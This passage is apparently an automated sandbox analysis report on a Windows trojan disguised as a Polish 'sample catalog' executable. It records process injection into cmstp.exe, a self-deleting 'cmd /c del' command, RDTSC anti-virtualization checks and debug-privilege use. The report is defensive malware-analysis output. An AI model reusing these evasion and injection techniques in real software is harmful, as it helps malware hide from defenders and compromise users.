          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00418700 NtClose,1_2_00418700
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004187B0 NtAllocateVirtualMemory,1_2_004187B0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004185CD NtCreateFile,1_2_004185CD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041867E NtReadFile,1_2_0041867E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004186FA NtClose,1_2_004186FA
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_004187AA NtAllocateVirtualMemory,1_2_004187AA
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_009F98F0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9840 NtDelayExecution,LdrInitializeThunk,1_2_009F9840
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_009F9860
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F99A0 NtCreateSection,LdrInitializeThunk,1_2_009F99A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_009F9910
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_009F9A00
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A20 NtResumeThread,LdrInitializeThunk,1_2_009F9A20
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A50 NtCreateFile,LdrInitializeThunk,1_2_009F9A50
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F95D0 NtClose,LdrInitializeThunk,1_2_009F95D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9540 NtReadFile,LdrInitializeThunk,1_2_009F9540
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_009F96E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_009F9660
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9780 NtMapViewOfSection,LdrInitializeThunk,1_2_009F9780
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_009F97A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9FE0 NtCreateMutant,LdrInitializeThunk,1_2_009F9FE0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9710 NtQueryInformationToken,LdrInitializeThunk,1_2_009F9710
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F98A0 NtWriteVirtualMemory,1_2_009F98A0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9820 NtEnumerateKey,1_2_009F9820
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FB040 NtSuspendThread,1_2_009FB040
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F99D0 NtCreateProcessEx,1_2_009F99D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9950 NtQueueApcThread,1_2_009F9950
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A80 NtOpenDirectoryObject,1_2_009F9A80
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9A10 NtQuerySection,1_2_009F9A10
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA3B0 NtGetContextThread,1_2_009FA3B0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9B00 NtSetValueKey,1_2_009F9B00
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F95F0 NtQueryInformationFile,1_2_009F95F0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FAD30 NtSetContextThread,1_2_009FAD30
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9520 NtWaitForSingleObject,1_2_009F9520
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9560 NtWriteFile,1_2_009F9560
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F96D0 NtCreateKey,1_2_009F96D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9610 NtEnumerateValueKey,1_2_009F9610
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9650 NtQueryValueKey,1_2_009F9650
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9670 NtQueryInformationProcess,1_2_009F9670
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA710 NtOpenProcessToken,1_2_009FA710
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9730 NtQueryVirtualMemory,1_2_009F9730
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9770 NtSetInformationFile,1_2_009F9770
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009FA770 NtOpenThread,1_2_009FA770
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F9760 NtOpenProcess,1_2_009F9760
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004185D0 NtCreateFile,1_1_004185D0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00418680 NtReadFile,1_1_00418680
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00418700 NtClose,1_1_00418700
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004187B0 NtAllocateVirtualMemory,1_1_004187B0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004185CD NtCreateFile,1_1_004185CD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041867E NtReadFile,1_1_0041867E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004186FA NtClose,1_1_004186FA
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_004187AA NtAllocateVirtualMemory,1_1_004187AA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04689860
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689840 NtDelayExecution,LdrInitializeThunk,11_2_04689840
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689540 NtReadFile,LdrInitializeThunk,11_2_04689540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04689910
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046895D0 NtClose,LdrInitializeThunk,11_2_046895D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046899A0 NtCreateSection,LdrInitializeThunk,11_2_046899A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04689660
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689650 NtQueryValueKey,LdrInitializeThunk,11_2_04689650
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A50 NtCreateFile,LdrInitializeThunk,11_2_04689A50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046896E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_046896E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046896D0 NtCreateKey,LdrInitializeThunk,11_2_046896D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689710 NtQueryInformationToken,LdrInitializeThunk,11_2_04689710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689FE0 NtCreateMutant,LdrInitializeThunk,11_2_04689FE0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689780 NtMapViewOfSection,LdrInitializeThunk,11_2_04689780
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468B040 NtSuspendThread,11_2_0468B040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689820 NtEnumerateKey,11_2_04689820
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046898F0 NtReadVirtualMemory,11_2_046898F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046898A0 NtWriteVirtualMemory,11_2_046898A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689560 NtWriteFile,11_2_04689560
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689950 NtQueueApcThread,11_2_04689950
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689520 NtWaitForSingleObject,11_2_04689520
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468AD30 NtSetContextThread,11_2_0468AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046895F0 NtQueryInformationFile,11_2_046895F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046899D0 NtCreateProcessEx,11_2_046899D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689670 NtQueryInformationProcess,11_2_04689670
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A20 NtResumeThread,11_2_04689A20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A00 NtProtectVirtualMemory,11_2_04689A00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689610 NtEnumerateValueKey,11_2_04689610
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A10 NtQuerySection,11_2_04689A10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689A80 NtOpenDirectoryObject,11_2_04689A80
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689760 NtOpenProcess,11_2_04689760
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689770 NtSetInformationFile,11_2_04689770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A770 NtOpenThread,11_2_0468A770
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689730 NtQueryVirtualMemory,11_2_04689730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04689B00 NtSetValueKey,11_2_04689B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A710 NtOpenProcessToken,11_2_0468A710
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046897A0 NtUnmapViewOfSection,11_2_046897A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468A3B0 NtGetContextThread,11_2_0468A3B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02978680 NtReadFile,11_2_02978680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029787B0 NtAllocateVirtualMemory,11_2_029787B0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02978700 NtClose,11_2_02978700
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029785D0 NtCreateFile,11_2_029785D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029786FA NtClose,11_2_029786FA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297867E NtReadFile,11_2_0297867E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029787AA NtAllocateVirtualMemory,11_2_029787AA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_029785CD NtCreateFile,11_2_029785CD
          Source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.360157911.000000000EB2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426560618.0000000000C3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: nowy przyk#U0142adowy katalog.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe File read: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
          Source: nowy przyk#U0142adowy katalog.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe File created: C:\Users\user\AppData\Local\Temp\nsi487A.tmp
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@11/9
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C1
          Source: nowy przyk#U0142adowy katalog.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Binary string: cmstp.pdbGCTL source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nowy przyk#U0142adowy katalog.exe, 00000000.00000003.355596507.000000000E880000.00000004.00000001.sdmp, nowy przyk#U0142adowy katalog.exe, 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, cmstp.exe, 0000000B.00000002.619509927.0000000004620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nowy przyk#U0142adowy katalog.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: nowy przyk#U0142adowy katalog.exe, 00000001.00000002.427125481.0000000002690000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10005CC5 push ecx; ret 0_2_10005CD8
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B87C push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B812 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B81B push eax; ret 1_2_0041B882
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00416036 push cs; ret 1_2_0041604B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041A988 push cs; ret 1_2_0041A989
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00415C85 push 0000003Eh; ret 1_2_00415C87
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00414EBC push ecx; retf 1_2_00414EBD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A0D0D1 push ecx; ret 1_2_00A0D0E4
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B87C push eax; ret 1_1_0041B882
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B812 push eax; ret 1_1_0041B818
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B81B push eax; ret 1_1_0041B882
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00416036 push cs; ret 1_1_0041604B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041A988 push cs; ret 1_1_0041A989
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00415C85 push 0000003Eh; ret 1_1_00415C87
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_00414EBC push ecx; retf 1_1_00414EBD
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_1_0041B7C5 push eax; ret 1_1_0041B818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0469D0D1 push ecx; ret 11_2_0469D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B812 push eax; ret 11_2_0297B818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B81B push eax; ret 11_2_0297B882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02976036 push cs; ret 11_2_0297604B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B87C push eax; ret 11_2_0297B882
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297A988 push cs; ret 11_2_0297A989
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02974EBC push ecx; retf 11_2_02974EBD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0297B7C5 push eax; ret 11_2_0297B818
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_02975C85 push 0000003Eh; ret 11_2_02975C87
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe File created: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cmstp.exe Process created: /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10004E3E RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_10004E3E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000002968614 second address: 000000000296861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 00000000029689AE second address: 00000000029689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5448 Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 776 Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 1_2_004088E0 rdtsc 1_2_004088E0
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_10002F80 lstrcpyW,lstrlenW,lstrcpyW,lstrcatW,FindFirstFileW,wsprintfW,_GetThemeDocumentationProperty@16,_GetThemeDocumentationProperty@16,FindNextFileW,FindClose,0_2_10002F80
          Source: explorer.exe, 00000005.00000000.371834942.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.409164821.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.403585689.0000000006420000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.371834942.00000000083E0000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.382841011.000000000461E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.408833360.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.409164821.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_10008417 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_10008417
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Code function: 0_2_10003770 rtrystwqtc,GetProcessHeap,RtlAllocateHeap,VirtualProtect,0_2_10003770
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009E35A1 mov eax, dword ptr fs:[00000030h]1_2_009E35A1
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A7FDE2
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A7FDE2
